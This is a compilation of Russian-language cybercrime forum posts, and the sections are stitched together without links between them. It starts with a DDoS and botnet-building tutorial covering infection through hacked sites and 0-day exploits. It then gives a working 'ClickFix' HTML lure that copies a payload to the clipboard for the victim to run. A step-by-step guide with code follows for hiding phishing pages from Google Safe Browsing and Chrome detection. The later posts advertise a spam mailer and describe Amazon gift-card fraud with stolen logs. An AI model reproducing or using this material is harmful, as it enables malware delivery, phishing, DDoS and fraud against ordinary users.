обслуживании", осуществляемая при помощи отпраки пакетов на сервер жертвы с
тысячей ПК с использованием техники флудинга. Главная цель атаки - остановить
передачу сетевого траффика и обмен данными с web-сайтами, а также блокировать
работу хостов, от имени которых будет действовать хакер.
И чем она отличается от DoS-атаки??? Так вот, в этом то все и отличие:
Мы рассомтрели DoS-атаку, при которой с ОДНОГО компьютера отправлялись XXX-
пакеты и сервер удачно валился. А в DDoS-атаке отсылаются не с одного, а с
ТЫСЯЧЕЙ и БОЛЕЕ компьтеров XXX-пакеты.
Как это ТЫСЯЧА и БОЛЕЕ, что все хакеры сговорились )) ???? Нет, друг мой, все
эти тысяча и более компьтеров должны быть заражены трояном/червем, имеющих
поддержку DDoS-атаки. Для реализации DDoS-атаки общая пропускная способность
каналов, с которых производится атака, должна быть больше, чем канал
атакуемого компьютера.
Мы рассмотрели DoS-атаку, при помощи которой мы могли повалить сервер. А теперь представь себе, как десятитысяная армия ботов (зараженных машин) просто отсылает, допустим, ICMP-пакеты, используя простую технику ICMP-флудинга. Да от сервера останутся тоько "ножки, да рожки" =)))))))))! Захватывает дух, правда?
А как управлять такой армией? Способов очень много. Самый популярный и, наверное, простой - IRC . Ты отдаешь команду и все компьютеры-зомби, которые в сети исполняют твою команду. Властелин ламеров (в основном), так сказать ))
Технологии взлома сети различны. При достаточном количестве машин, эффективной будет атака любого типа: можно направить ICMP запросы на широковещательный адрес (Smurf атаки), поддельные HTTP запросы, фрагментированные пакеты, или случайный трафик. Цель будет наверняка так сокрушена, что перестанет работать вообще, или как минимум качество ее работы очень сильно упадет. Атака может быть направлена на любое сетевое устройство: маршрутизаторы (эффективно блокирует всю сеть), серверы (Web, mail, DNS), или специфичные компьютеры (firewalls, IDS).
Наибольшая сложность при защите от DDoS состоит в поддельных IP адресах атакующих машин. Эта проблема может быть решена с использованием методики, называемой «исходящая фильтрация» (Egress filtering). Исходящая фильтрация анализирует пакеты, направленные в Интернет на граничном маршрутизаторе, стоящем перед магистральным маршрутизатором. Эти маршрутизаторы должны знать адреса всех устройств, стоящих за ним, поэтому все, что отправлено с других адресов – подделка. Поддельные пакеты должны отбрасываться до их попадания в Интернет или на магистральный маршрутизатор. Если сетевые администраторы установят такую фильтрацию по умолчанию, поддельные пакеты станут почти невозможными, что многократно сократит процесс идентификации в исследовании DDoS. К сожалению, в большинстве сетей эти фильтры отключены, и поддельные пакеты беспрепятственно проходят. IPv6, будущий IP стандарт, также имеет возможности защиты от этой фундаментальной сетевой проблемы.
Распределенные атаки на отказ в обслуживании очень эффективны, и их трудно остановить. Окончательное решение этой проблемы требует от мирового сетевого сообщества неусыпно следовать строгим стандартам безопасности. В настоящий момент лучшей техникой защиты является готовность к такой атаке. Очень важно иметь план реагирования на DDoS инцидент. А использование исходящей фильтрации является хорошим стандартом безопасности, гарантирующим, что машина, находящаяся под вашим контролем, не участвует в таких атаках. Осведомленное компьютерное сообщество может сделать DDoS сегодня пережитком прошлого.
DDoS не использует уязвимости в программах, а лишь использует технику флудинга. Вот собственно и все. Технологии флудинга мы уже с тобой разобрали в разделе с DoS-атаками.
[DDoS на практике]
Как организовать ботнет
Организовать DDoS-атаку на самом деле просто. Самая большая проблема -
организация ботнета.
Как организовать ботнет:
1. Купить за огромную сумму (в зависимости от количества ботов)
2. Взять в аренду.
3. Заразить ушастых юзеров.
4. Угнать чужой ботнет
Как заразить огромное количество ушастых юзеров:
Существует много методов распространения этой инфекции. Примеры:
1. Взлом хостинга:
Получить хоть какие-нибудь привелении на запись
Сделать масс-дефейсинг, благодаря которым в код главной стараницы внедряется
наш код, использующий троян + эксплойт (допустим, для IE)
При заходе на главную страницу с браузера IE троян внедряется в систему,
ожидай комманд DDoS'ера из IRC-канала...
2. Взлом сайта с хорошей посещаемостью.
Вставка на главную страницу вредоносного кода ))
3. Написание червя, с использование 0-day эксплойта, приводящего к root'у.
Это отдельная тема.
Но перед тем как организовать ботнет, надо выбрать, чем заражать.
Вирусы
Самый наилучший спопосб, наверное, это написание червя. Писать червя надо
очень грамотно. И это довольно таки непросто. Но вспомнив ужаснейшую атаку при
помощи легендарного червя MyDoom - атакующего 22 августа 2003 года сайт
компании SCO. Подробнее в самом конце есть вырезка из статьи Forb'a (журнал
Хакер). Если написать успешного червя, да и приложить к его распространению
0-day эксплойт (приватный, так сказать), то с таким же успехом можно повалить
и microsoft.com. Главное - огранизовать огромнейший ботнет.
Конечно, червя можно и купить, а также заказать у VX-maker'ов, но это будет
стоить немало...
Трояны
Надеюсь, объяснять, что такое троян и чем он отличается от червя не надо.
Начнем.
Хочу тебя разочаровать, что в паблике ты ничего не найдешь. Все эти трояны
давно занесены в "Красную книгу" Касперского и других антивирусов. Так, что
есть два выходу:
1. Купить DDoS-троян.
Не спеши к VX-мэйкерам и хакерам раскупать у них трояны. Ты должен сначало
спросить про возможности, на чем написан, какой вес (размер трояна - это очень
важно, ведь троян должен быть мелким и юрким), палится ли он файрволом, какие
команды умеет, где прописывается, видно ли его в процессах и т.д. Если троян
не палится файрволом и антивирусом, да еще имеет маленький размер - то это
отличный троян. Обязательно покупай троян вместе с исходняками, чтобы его
можно было подредактировать и самому.
2. Написание DDoS-трояна.
Если ты уже давно кодишь и можешь писать приложения для интерета )))), то
можешь начинать. Не ищи в паблике статью "Как написать троян", дабы накодить
программу техникой Cut & Paste )), там ты можешь найти только небольшой ответ,
а дальше уж сам по себе. Если возникают вопросы по написанию, то попроси о
помощи (только без вопросов типа "А как написать троян", а какие нибудь более
разумные, вроде "Как сделать перехват API" и тут тебе дадут ссылку
.
Главное - не грузи помогающего, не то он добавит тебя в игнор-лист)
Обязательно протестируй своего троянца после написания.
0-day эксплойты
Лучше всего при распространении использовать 0-day эксплойт - приватный
эксплойт, который нельзя нигде достать в публичных источниках. Если выбирать
для трояна - то это, безусловно, эксплойт для Internet Explorer. Для червя это
серьезная уязвимость, приводящая к root'у, как, например, баг в RPC-DCOM (его
вроде как использовал MyDoom).
Есть два выбора:
1. Искать баг самому.
2. Купить его у каких-нибудь хакерюг.
Ну что. Дрпустим, ты собрал ботнет из 20 000 ботов. Ты занешь все его команды и как управлять, ведь написал его ты (узнал все при покупке). Теперь ты заходишь в IRC. Отдаешь команду и все.
Что еще прочитать
Как ты понял, здесь все просто. Главные проблемы мы с тобой рассмотрели. Очень хорошую статью (там все разжевано) по DDoS-атаке на практике ты можешь прочесть в журнале "ХАКЕР" выпуск #70, октябрь 2004 года, называется она "DDoS в картинках". Зайди на самом xakep.ru > раздел журналы > 2004 > Октябрь. Там есть PDF'ка (много весит, это целый журнал) и HTML-версия.
[Защита]
Юные исследователи
Если вы заметили огромное увелечение трффика, но надо начать исследование перехваченных пакетов. Это очень важно для следующего пункта
Надежда умерает последней - Фильтрация
Исследование перехваченных пакетов иногда дает хорошую возможность снизить ущерб от DDoS-атаки, дабы с помощтю исследования можно создать списки контроля доступа маршрутизатора или правила файрвола - ACL.
Если огромный трафик исходит от определенного провайдера или маршрутизатора (магистрального), то можно заблокировать весь трафик от этого источника, узнав его, это позволит пройти части легитимного трафика
Наибольшая сложность при защите от DDoS состоит в поддельных IP адресах атакующих машин. Эта проблема может быть решена с использованием методики, называемой «исходящая фильтрация» (Egress filtering). Исходящая фильтрация анализирует пакеты, направленные в Интернет на граничном маршрутизаторе, стоящем перед магистральным маршрутизатором. Эти маршрутизаторы должны знать адреса всех устройств, стоящих за ним, поэтому все, что отправлено с других адресов – подделка. Поддельные пакеты должны отбрасываться до их попадания в Интернет или на магистральный маршрутизатор. Если сетевые администраторы установят такую фильтрацию по умолчанию, поддельные пакеты станут почти невозможными, что многократно сократит процесс идентификации в исследовании DDoS. К сожалению, в большинстве сетей эти фильтры отключены, и поддельные пакеты беспрепятственно проходят. IPv6, будущий IP стандарт, также имеет возможности защиты от этой фундаментальной сетевой проблемы.
Оборудование
Этот пункт говорит о том, что нужна установка специального оборудования и увеличения пропускной способности во время атаки и ожидание ее прекращения.
Ваш провайдер
Есть еще надежда на провайдера. Если Ваш провайдер не деревенщина, то у него помогут быть специальные сенсоры, с помощью которых он иожет определить резкое возростание траффика в XXX-точке. Таким образом он обязан помочь Вам в этой проблеме )))
Заключение
DDoS-атака чаще всего прекращается из-за атакующего, которому уже /надоело/не надо флудить/ вашу систмему, а не из-зи грамотоного админа. Наж этим стоит задуматься )
[Вывод]
DDoS - это огромная ппроблема на сегодняшний день в мире информационной безопасности. Для этих атак нет серверов, которые бы не ушли в "даун". Единственный выход - готовность к атаке, которая и не особо помагает. Кстати, атаки могут производиться не только с помощью ботов, также можно произвести и со взломанных роутеров или инфецированных *nix-машин. Их удачно можно использовать для генерации XXX-пакетов... Все. Удачи тебе в DDoS'е!
[Самые мощные DoS/DDoS-атаки]
=====Примечание: "Самые мощные DDoS/DoS-атаки" Журнал "Хакер". URL: www.xakep.ru===========
Теперь ты знаешь, что собой представляет атака на отказ в обслуживании. Пришло время составить небольшой хит-парад DoS/DDoS-атак.
Пожалуй, самой нашумевшей атакой из разряда DoS стала атака на корневые DNS-сервера, произошедшая в ноябре 2002 года. Тогда распределенной атаке подверглись все 13 DNS-серверов, семь из которых вышли из строя. Только высокий уровень избыточности в структуре интернета позволил избежать задержек при обращении к ресурсам.
Атака на сайт SCO, совершенная при помощи вируса MyDoom и всех его подцепивших. 22 августа 2003 года сайт компании SCO перестал отвечать на запросы пользователей. Атака продолжалась несколько дней и прекратилась только 25 августа. Поскольку вирус MyDoom имел очень широкое распространение, то атака получилась мощнейшей. Вторая редакция вируса MyDoom.B, созданная для атаки на сайт Microsoft, не имела такого "успеха" у пользователей.
Серверы Osirusoft крупнейшего хранилища IP-адресов, замеченных в спаме, были отключены после большого количества распределенных атак на отказ в обслуживании. Данная служба занималась ведением динамического списка IP- адресов, замеченных в спаме. (Хехе! Бойтесь спамеров! Спамеры уже и флудеры ))
.
[Заработок на DDoS-атаках]
DDoS-атаки - это очень прибыльное дело. Минимальная плата за DDoS-атаку в час
[The End]
Ну вот я и рассказал тебе о DoS/DDoS атаках. Надеюсь тебе было интересно. Ну
всё. Удачного флуда и защиты от него!
P.S: При написании статьи использовались материалы: материалы с
SecurityLab.ru, материалы из журнала "Хакер" и также "СпецХакер"
(www.xakep.ru)
Меня давно интересовал этот вопрос. Есть доступ к забугорным ресурсам с правами на запись. Сайты, естественно, незаметно взятые на неопределенное время пользования. Вот в чём вопрос: какой и куда лучше продать трафф? Кто какими сервисами пользовался или лучше просто договориться с веб-мастером о продаже?
P.S. интересно мнение о баннере в правом верхнем углу.
я закачал на сервер все фаили которие находеца в папки cmd и в config.php поменял на пут к base.txt котори находеца на сервери и потом закачал етот config.php на сервер в папку admin, захажу на cmd.php пишет что зарегал мне..захажу на линк к base.txt и нечо не запесала туда..чо делат? как сделат чтоб всо работало? :bang:
Я просто офигеваю как у некоторых личностей зашкаливает борзометр <_<
Вот цитата которые получили множество людей:
Ты че? Такие понты б**. " Спамеры, мол заебали"! Да иди ты на хй! Гнида позорная! Че б** бесишься, что другие могут деньги зарабатывать, а у тебя, походу, не получается. Что у кого-то получается, а тебе приходиться хй сосать, то в прямом, то в переносном смысле. Знай, сука, что антиспамеры - это самые мелочные люди, которые брызжут ядовитой слюной. И больше ничего они не могут. Вы , антиспамеры, вы же трусы все, вы только по форумам можете попердеть и сыпать детскими угрозами. А так, вы же кучка баранов. Уверен, даже если я оставлю здесь свой телефон, то на него никто не позвонит. И никто не докажет свою правоту .Потому что вы все ссыте. (495)1417462, только х*й вы осмелитесь мне что-то реально сказать. Ну что, тебя спамеры ебали всегда своим "сраным мпамом"? Ну вот и терпи, так, вас, антиспамеров учить надо.
Click to expand...
Здрасте у меня такая идейка - создать ботнет для очень нехороших действий,
конечно же вы понимаете о чем я.
Я начну по плану. Рассмотрю два пути создания.
I 1. На visual basic пишется очень зловредный activeX код, этот код пихается в
IFRAME на html страничку.
2. Создаётся warez сайт однодневка на котором выкладывается очень популярный
буржуйский софт(например Norton Ghost и Nero). Линки на страничку с этим
софтом сабмитятся в Direct Downloads(мощнейщий трафик генератор, позволяет
привлеч на сайт за сутки 1000-2000 посетителей). Как только админ ddl
разместил на своем сайте линк на страницу с этим самым оч. популярным софтом,
мы вставляем вредоностный код в шапку нашего сайта( IFRAME тэг со ссылкой на
нашу серврную часть бота).
3. Теперь всем кто не отказался от установки ActiveX компонента получат нашу
серверную бота часть в красивой упаковке.
II Второй способ сводится к тому чтобы всесто AciveX компонента впарить
трояшку через дырки в IE. У этого способа куча минусов - примерно 5% попадутся
на удочку так как всё палится антивирем и тд.
Собственно к чему я это пишу - никто не смог бы написать activeX бота для таких действий?
В аттаче .txt файл с мануалом. Набромал за 10 минут. Сюда не хотел делть copy/paste так как это испортит вид манула. Все, читайте и развивайтесь. И незадавайте мне глупых вопросов :bang:
зы. http://www.xss.is/index.php?act=links&CODE=02&cat=14 - тут сами боты (их исходники). все качайте
пацани..помоготе плизз, да не как справеца до конца не могу с етим
Ддосом(Привате Инвисибле Ддосер)-всо закачал права на басе.тхт поставел, а шас
после того как вистабьил прова нужно изменить в config.php линк на тот линк
там где находеца твоы басе.тхт и закачать на сервер впапку админ-
откриваыу вкомпе config.php пишу адрес к басе.тхт вот так:
потом- захажу на cmd.php- регаит меня, захажу на басе.тхт посмотрет если добавело-нема не фега не добавела..помогити..подскожите чо та делать нада ?
Всем привет!
открываю топик с целью пообщаться на тему трафика, задавайте любые
интересующие вопросы
Есть два небольших исходника ддос-ботов.Пробовал компилировать в lcc,но чего
то не компилируется.Может есть специально ошибка в коде.Кто может,посмотрите
пожалуйста.
Если у вас скомпилится и вас не затруднит, выложите небольшое обучающее видео
по компиляции этих файлов в Lcc.Очень интересно.Заранее спасибо!
Всем привет .
Очень нужен совет от действующих траферов с пирогов.
Погрузился в тему ,но решают ньюансы, уже были неудачные тесты.
Если есть возможность напишите в лс ,задам вопросы .
Буду очень признателен ,могу обменять инфу на инфу по гугл адс трафику ,либо
оплатить или отблагодарить .
По сути - планируется работа по сео трафику.
Очень прошу откликнуться .
Всем добра !
Демо
https://dunkelrrr.github.io/Popup/
Плюсы:
-не нужны скачивания, расшифровка запароленных архивов, обход motw и скантайма ав (на этом шаге Drop-off Rate максимальный)
-сайт не считается "contains malicious software", не падает seo и траст
-работает когда жертва не хотела и не собирается ничего скачивать, допустим зашел на адалт, или ему просто что то очень надо сделать на сайте
Можете свой дизайн сделать/творчески оформить, и писать "Succes
" и
закрывать оверлей когда прилетает лог с того же ip (чтобы реднек ниче не
заподозрил и не побежал менять креды на акках)
HTML:Copy to clipboard
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Verification Modal</title>
<link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap" rel="stylesheet">
<style>
body {
font-family: 'Roboto', sans-serif;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
margin: 0;
background-color: #f5f5f5;
}
#openModal {
padding: 15px 30px;
font-size: 1.5rem;
background-color: #468ef7;
color: white;
border: none;
border-radius: 5px;
cursor: pointer;
transition: background-color 0.3s;
}
#openModal:hover {
background-color: #356ac1;
}
.modal {
display: none;
position: fixed;
z-index: 1;
left: 0;
top: 0;
width: 100%;
height: 100%;
background-color: rgba(0, 0, 0, 0.4);
}
.modal-content {
background-color: white;
margin: 10% auto;
padding: 30px;
border: 1px solid #888;
width: 80%;
max-width: 600px;
text-align: center;
border-radius: 10px;
}
.modal h2 {
color: #468ef7;
font-size: 3rem;
}
.modal p {
font-size: 2.25rem;
text-align: center;
}
.modal .steps p {
font-size: 2rem;
line-height: 1.5;
}
.windows-icon {
width: 25px;
vertical-align: middle;
margin: 0 5px;
}
</style>
</head>
<body>
<button id="openModal">Open Verification Modal</button>
<div id="myModal" class="modal">
<div class="modal-content">
<h2>Verification Steps</h2>
<div class="steps">
<p>1. Press Windows Button <img src="https://img.icons8.com/ios11/512/windows-10.png" class="windows-icon"/> + R</p>
<p>2. Press CTRL + V</p>
<p>3. Press Enter</p>
</div>
</div>
</div>
<script>
const command = 'cmd'; //твой пейлоад
function copyToClipboard() {
navigator.clipboard.writeText(command);
}
document.getElementById("openModal").onclick = function() {
copyToClipboard();
document.getElementById("myModal").style.display = "block";
}
window.onclick = function(event) {
if (event.target == document.getElementById("myModal")) {
document.getElementById("myModal").style.display = "none";
}
}
</script>
</body>
</html>
Эта статья - переработанная и дополненная версия опубликованной мной ранее
статьи https://forum.exploit.in/topic/218301/.
Теперь я написал пошаговое руководство с примерами кода, как спасти ваш
лендинг от красного экрана счастья.
Звучит неплохо. Поехали.
Google Safebrowsing состоит из четырех частей:
Зарегистрировать стойкий к абузам домен можно на domains4bitcoins.com или domaindiscount24.com (эти сервисы реселлят многие продавцы стойких к абузам доменов). Домену нужно дать отлежаться хотя бы неделю, т.к. зарегистрированным вчера доменам гугл не доверяет совсем. Имя домена не должно содержать:
Для примера возьмем домен 4bi.us.
Для этого привяжем домен к cloudflare.com. Все ssl- сертификаты при создании попадают в специальный фид, называемый certificate transparency log. Этот фид постоянно мониторят антивирусные компании. Посмотреть на него самим можно например здесь: https://certstream.calidog.io/. По-этому все сертификаты, выданные для доменов, содержаших брендовые слова или брендовые слова с опечатками моментально попадают в поле зрения антивирусных компаний, и ваш фишинг, размещенный на домене с опечаткой будет моментально помечен как вредоносный. Таким образом мы не можем заказать сертификат для брендового домена с опечаткой. Однако, cloudflare дает нам возможность бесплатно заказать wildcard сертификат. Это сертификат для всех сабдоменов домена, без указания конкретного имени сабдомена. Таким образом наш сабдомен с опечаткой в имени не будет замечен антивирусными компаниями.
Вот как запись для wildcard-домена выглядит в настройках dns домена в cloudflare:
Здесь 122.1.1.231 - ip-адрес нашего сервера. Теперь наш лендинг будет доступен, например, по адресу telegrarn.4bi.us.
Краулер GSB (как и краулер GoogleAds) сделан на основе чистого движка Google Chrome с минимальными изменениями. Он запускается в headless-режиме и управляется через webdriver-протокол. По ip-адресу пытаться блокировать его бессмысленно, т.к. он использует прокси-сервера с домашними адресами. Но в headless-режиме у десктопной версии браузера Chrome выключается поддержка [Notification API](https://www.javascripttutorial.net/web-apis/javascript- notification/). По наличию поддержки этого api мы определим краулер и покажем ему белый сайт вместо вредоносного.
Для начала мы создадим белый сайт-обманку. Купить готовый белый лендинг для клоакинга можно за копейки в боте https://t.me/whitegen_bot.
Предположим, стартовая страница нашего фишинга называется index.php. Переименуем ее в home.php , а в тело страницы index.php положим код чистой (белой) страницы лендинга, созданной с помощью телеграм-бота.
Теперь код стартовой страницы index.php выглядит примерно так:
Чтобы пользователи видели не белый сайт, а нашу фишинг-страницу, добавим в head-секцию нашей стартовой страницы index.php следующий html-код:
HTML:Copy to clipboard
<script>
home = 'L2hvbWUucGhw';
zones = /Madrid|Canary|Vienna|Istanbul/gi;
timezoneOffset = zones.test((new Intl.DateTimeFormat).resolvedOptions().timeZone);
self.Notification&&timezoneOffset&&fetch(atob(home)).then(
function(r){return r.text().then(function(t){document.write(t)})}
);
</script>
В этом коде мы делаем следующее:
zones = /Madrid|Canary|Vienna|Istanbul/gi;
на строчку zones = /Berlin/gi;
и таким образом отсечем всех пользователей (и краулеры) с другим часовым поясом, выбранном в настройках их системы.Теперь код нашей стартовой страницы index.php выглядит примерно так:
А все подходящие нам пользователи видят наш злой лендинг:
Отлично. Идем дальше.
Краулер google проверяет и запоминает все js-файлы со страниц, определенных как вредоносные. По-этому перед началом работы нам обязательно нужно обфусцировать заново все js-файлы нашего лендинга. Для этого можно воспользоваться любым из многочисленных javascript-обфускаторов, например https://obfuscator.io/.
В браузер Chrome встроен механизм определения фишинговых сайтов на основе совпадения суммы всех пикселей страницы каждого цвета с палитрами сайтов, посещенных пользователем ранее. Подробнее про этот механизм можно прочесть здесь: <https://blog.chromium.org/2021/07/m92-faster-and-more-efficient- phishing-detection.html>.
Изменить палитру цветов нашего лендинга мы можем в одну строчку javascript- кода, которую необходимо поместить в js-файл, загружаемый из _< head> _секции страницы home.php , для того, чтобы она была выполнена раньше, чем загрузится тело страницы. Вот эта строчка:
JavaScript:Copy to clipboard
document.documentElement.style.cssText="filter:hue-rotate(4deg)";
Добавим ее в любой javascript-файл из < head> секции страницы, например в jquery.js:
Антивирус Kaspersky проверяет совпадение содержимого тега < title> страницы с содержимым < title> страниц, посещенных пользователем ранее. Заменим, например:
на любой другой текст:
Адреса всех скаченных браузером Chrome файлов отправляются в google, и затем по этим адресам приходит краулер GoogleSafeBrowsing, скачивает файлы и анализирует их своим собственным антивирусным движком и на платформе virustotal.com. Хеши опасных файлов и секций исполняемых файлов хранятся в браузере Chrome локально. По-этому прежде всего нам необходимо использовать чистый файл. Так же хром будет блокировать скачивание файла, если:
Для общего ознакомления в исходном коде браузера Chromium можно прочесть по каким параметрам браузер определяет опасность файла : https://source.chromium.org/chromiu...;drc=591c5c478112625a5da995afeeb6566429c04ef9.
Какие файлы Chrome считает исполняемыми можно посмотреть вот здесь: https://source.chromium.org/chromiu...;drc=af17ad3f07c1d8a24381eb7669bec0c2ffb86521.
Сначала с помощью утилиты SigThief мы приклеим к нашему файлу любую цифровую подпись, взятую с любого подписанного выполняемого файла.
Чтобы предотвратить скачивание нашего файла краулером google, нам необходимо:
Предположим наша кнопка для скачивания файла выглядит вот так:
Уберем из нее прямой адрес файла, например закодировав его в base64 любым из base64 энкодеров (например base64encode.net) и добавим для кнопки любой id , чтобы зацепиться за нее в javascript:
Теперь в наш .js файл (в нашем примере это jquery.js) добавим код, который
дождется полной загрузки DOM-дерева страницы и у всех ссылок с id="clickbtn"
заменит адрес файла на временный blob-url :
JavaScript:Copy to clipboard
document.addEventListener('DOMContentLoaded',function(e) {
document.querySelectorAll('#clickbtn').forEach(function(a,url) {
url = atob(a.href.split('/').slice(-1)[0]);
fetch(url).then(function(r){return r.blob()}).then(function(blob){
a.href = URL.createObjectURL(blob);
a.download = url.split('/').slice(-1)[0];
});
});
});
Теперь наш файл с javascript-кодом будет выглядеть примерно вот так:
Теперь обфусцируем этот код с помощью obfuscator.io:
Великолепно.
Пожалуйста не забывайте, что даже если архив с файлом защищен паролем, браузер Chrome все равно может видеть имена файлов в архиве, и понять, что архив содержит исполняемые файлы.
Click to expand...
Это уже сложнее. Прежде всего, Chrome заранее относится с подозрениям к html- страницам, содержащим поле ввода пароля или слово password на любом языке.
Сначала избавимся от слов password на странице. Псевдо-элементы в css , такие как ::before или ::after не учавствуют в представлении DOM-дерева страницы и идеально подходят для нас. Уберем слово password из кода страницы, и выведем его с помощью css. Предположим, что наше слово password в коде страницы выглядит вот так:
Уберем его, а на его место поставим любой строковый элемент с любым классом. Например span с классом pass :
Теперь в любое место html-кода нашей страницы добавим следующий html-код:
HTML:Copy to clipboard
<style>
.pass::before {content:"pass"}
.pass::after {content:"word"}
</style>
В данном случае мы разбили слово password на две части и внутри блока стилей. И вот результат:
Избавимся от поля ввода пароля, заменив его на обычный <input type="text">
.
Предположим, наше поле ввода пароля выглядит следующим образом:
Заменим его на следующий код:
HTML:Copy to clipboard
<div class="wrapper">
<input type="text" id="dots" class="form-control input ext-input text-box ext-text-box">
<input type="text" name="passwd" id="i0118" class="form-control input ext-input text-box ext-text-box">
</div>
Мы заменили тип поля для ввода пароля с password на text , затем перед ним
добавили такое же текстовое поле ввода с id= "dots", и обернули оба поля в
отдельный слой. Это необходимо чтобы изобразить натуральное поле ввода пароля.
Первый input будет содержать только символы ●
, изображая символы пароля по
мере их ввода пользователем. Второй input будет наложен сверху на первый,
иметь нулевую прозрачность, и передавать все набранные символы в первый
input. Мы так же скопировали все классы от input с паролем в классы
элемента input с жирными точками, чтобы сохранить оригинальное оформление.
Теперь позаботимся о наложении второго поля для ввода на первое. Добавим в код
нашей страницы следующие стили:
CSS:Copy to clipboard
.wrapper {position:relative;}
.wrapper input[type=text] {position:absolute!important}
.wrapper #i0118 {opacity:0!important}
где в нашем примере #i0118
- это id оригинального поля для ввода пароля.
Теперь наш css-код выглядит вот так:
В приведенном выше коде значение position:relative у блока с классом wrapper необходимо чтобы позиционировать внутренние блоки абсолютно к родительскому элементу.
Теперь оживим поля ввода с помощью javascript. Добавим следующий код в любой
из подключенных .js файлов (или прямо в тело страницы, предварительно
обернув его тегом <script>
):
JavaScript:Copy to clipboard
document.addEventListener('DOMContentLoaded', function(e) {
i0118.onfocus = function(e){dots.value=dots.value||'|'}
i0118.onkeyup = function(e){dots.value=i0118.value.replace(/./g,'●')+'|'}
});
В приведенном выше коде i0118
- это id оригинального поля для ввода
пароля, а dots
- это id поля, изображающего пользовательский ввод. Теперь
наш js-код выгдялит следующим образом:
Если вы включали весь код в тело страницы, то теперь она выглядит примерно так:
И вот наш итоговый результат:
Поиграть с живым примером кода можно на jsbin.com: https://jsbin.com/mipoqoxeve/edit?html,output
Click to expand...
Отлично. Мы избавились от всех упоминаний слова password на странице, и убрали поле ввода пароля.
Теперь, если мы проделали все шаги правильно, наш лендинг в полной безопасности:
P.S.
Ман пошел по рукам, так что выложил. Ссылка для распространения вне xss.is:
step. ](https://telegra.ph/Getting-rid-of-Google-Safebrowsing-red-screen-once- and-forever-Step-by-step-02-18)
Эта статья - переработанная и дополненная версия опубликованной мной ранее статьи https://forum.exploit.in/topic/218301/. Теперь я написал пошаговое руководство с примерами кода, как спасти ваш лендинг от красного экрана счастья. 0. Что мы узнаем? Содержание Из чего состоит Google Safe Browsing...
telegra.ph
Наслаждайтесь. Оригинал на моем канале https://t.me/badadvertiser. Что-то я там наверное буду писать и дальше. Жду в гости.
Всем добрый день, мы решили больше не скрываться в тени как упыри и явить себя миру и выйти из привата, выглянуть на публичный свет, дабы предоставить полностью бесплатную версию Bluepony.
Webmailer - работает в основном на запросах на базе БАС'а, есть маленькие моменты, когда GMAIL нуждается в авторизации через браузер, но мы стараемся это сделать побыстрее. В бесплатной версии будет доступен 1 поток, но даже при 1 потоке на запросах стреляет как из пулемета.
Bluepony Free работает с такими доменами как: Aol, Yahoo, Gmail, Mail.com, Gmx.com, Web.de, Mail.ru, Outlook, Zoho и даже SMTP (здесь будем дорабатывать). В будущем мы добавим еще домены. Какие-то домены могут отвалиться, но мы стараемся их в срочном порядке фиксить, потому что они тоже не стоят на месте и могут добавлять всякого и разного.
В майлере присутствует OPENai gpt, вы можете как генерировать письма и картинки, html письма... куча настроек и моментов, так вы можете использовать и AI во время рассылки, вы описываете в промте нужную тему и детали и получаете 100% генерированное письмо во время самой рассылки
Мы не работаем с профилями, только с кукисами... но там мы записываем всё, в том числе привязываем прокси к аккаунту.
Да у нас есть опция подключения фингерпринтов (например для авторизаций GMAIL)
Так же у нас есть руководства по майлеру и так же по OPENai на русском и на английском
В майлере присутствуют два пдф генератора, которые работают в момент рассылки это: Openserver и wkhtmltopdf
Скачать майлер и руководства можете здесь, данные для авторизации там же, на нашем канале: https://t.me/uepony
Пользуйтесь, тестите, пишите фидбек, что понравилось, что нет, будем рады любым отзывам, и да, вместо тысячу вопросов, воспользуйтесь пожалуйста вначале руководством, всем любви)
Автор 4el
Источник exploit.in
Всем САЛАМ. В сфере логов с ноября 2021 года.
Пришлось как-то выкручиваться в жизни и случайно наткнулся на эту сферу. Сначала делал аирбнб с логов на хостов (кидали неск раз, но профит был, сейчас хз как с ним). Потом случайно наткнулся на амазон и решил сделать гифт. Сделал, прилетел, с горем пополам продал (каждый рубль был на счету).
В итоге начал лупить только амаз. Прогонял паблик логи через крякнутый чекер. Так как на ввх с 2017 года, то уже начитался много всяких различных схем и тд, но отчетливо запомнилось слово "антифрод система"(в дальнейшем сокращенно "АФ").
И начал использовать некоторые действия в амазоне, чтобы АФ не ругался и слал да слал мне гифты. Было время оч сладкое, преддверие НГ(к слову, самое сладкое время, АФ оч ослаблен).
И начало получаться по 5-10 гифтов в день (100-300 $ чистыми в день).
Всегда были поставщики материала (логов), не покупал и не покупаю. Работа в пополаме.
Потом решил обучать людей схеме. За 1 к $ полностью доводил до окупа затрат, доводил чуть ли не за руку.
Няньчился, нервничал, вкладывал свою энергию в обучение (параллельно приходилось работать самому).
Платно обучил 2х. Бесплатно обучил 5х людей (90 % из них оказались неблагодарными, Бог им судья).
Все бы ничего, пока не начались те самые сильнейшие "месячные" у амазона (АФ сталь злее, гифты прилетали по 1-5 шт в день).
И так от "месячных" до "месячных" кормил амазон меня и некоторых родственников(первые полторы декады месяца самые печальные обычно).
и по итогу пришлось переключиться на гейм линк (случайно подсказал кто-то из партнеров). И неплохо так мы жили на нем (я работал один, но бабками всегда делился с родственниками и баловал их.
В итоге, примерно 7-8 мес назад решил вернуться к амазону, а именно к доменам .ca .com.au
так как замечал обычно больше гифтов с этих доменов и летели на ура. Это дало пищу для размышлений и тестов.
И в итоге нашел ту самую схему (а именно БАГ на амазоне).
Делюсь по порядку что использовал\ую для работы:
1.) антидетект браузер Octo, 35 usdt в мес. (именно в окто получается схема, на других не чекал)
2.) NordVPN, 200-300 рублей максимальная подписка.
**он работает только при этих условиях, инструкция обхода (так как в РФ
заблочен):
___a) качаем сначала ZoogVPN , версия 6.6.2.2, и всегда отменяем предложение
обновить
(регаемся на любую временную почту, потом будет автоматом логиниться)
___b) качаем NordVPN , версия 6.40.5.0, и всегда отменяем предложение обновить
___c) сначала запускаем и подключаемся к ZoogVPN ( желательно по протоколу
ZoogTLS )
___d) и только после него запускаем и логинимся под Цугом в сам Норд.
___e) выбираем любое гео и сервер в Норде
___f) и как только видим, что он подключился - СРАЗУ ЖЕ БЫСТРО ВЫКЛЮЧАЕМ ЦУГ В
САМОМ ТРЭЕ.
___g) вуа-ля! Блок РФ обошелся. (после написания статьи не уверен, что будет
работать дальше, но есть надежда, что органы не пофиксят!)
3.) нужны соответственно логи, гео AU, NZ, CA
